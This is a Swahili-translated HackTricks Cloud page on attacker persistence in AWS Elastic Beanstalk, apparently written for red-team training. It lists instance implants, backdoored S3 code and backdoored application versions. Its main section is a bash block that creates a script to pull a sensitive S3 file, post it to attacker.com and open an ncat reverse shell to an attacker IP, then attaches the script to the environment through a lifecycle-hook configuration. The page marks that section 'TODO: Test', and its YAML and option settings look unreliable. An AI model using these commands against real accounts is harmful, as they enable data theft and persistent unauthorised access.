AWS - Elastic Beanstalk Persistence

Jifunze na kufanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na kufanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

Elastic Beanstalk

Kwa maelezo zaidi angalia:

AWS - Elastic Beanstalk Enum

Uendelevu katika Instance

Ili kudumisha uendelevu ndani ya akaunti ya AWS, baadhi ya mifumo ya uendelevu inaweza kuingizwa ndani ya instance (cron job, ssh key...) ili mshambuliaji aweze kuipata na kuiba credentials za IAM role kutoka huduma ya metadata.

Backdoor katika Version

Mshambuliaji anaweza kuweka backdoor kwenye msimbo ndani ya repo ya S3 ili kila mara utekeleze backdoor yake na msimbo unaotarajiwa.

Toleo jipya lenye backdoor

Badala ya kubadilisha msimbo kwenye toleo halisi, mshambuliaji anaweza kupeleka toleo jipya lenye backdoor la programu.

Kunyanyasa Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk inatoa lifecycle hooks zinazokuruhusu kuendesha scripts maalum wakati wa utoaji na kumaliza instance. Mshambuliaji anaweza kuweka lifecycle hook ili mara kwa mara kutekeleza script inayovujisha data au kudumisha ufikiaji wa akaunti ya AWS.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

Jifunze na kufanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na kufanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 1 month ago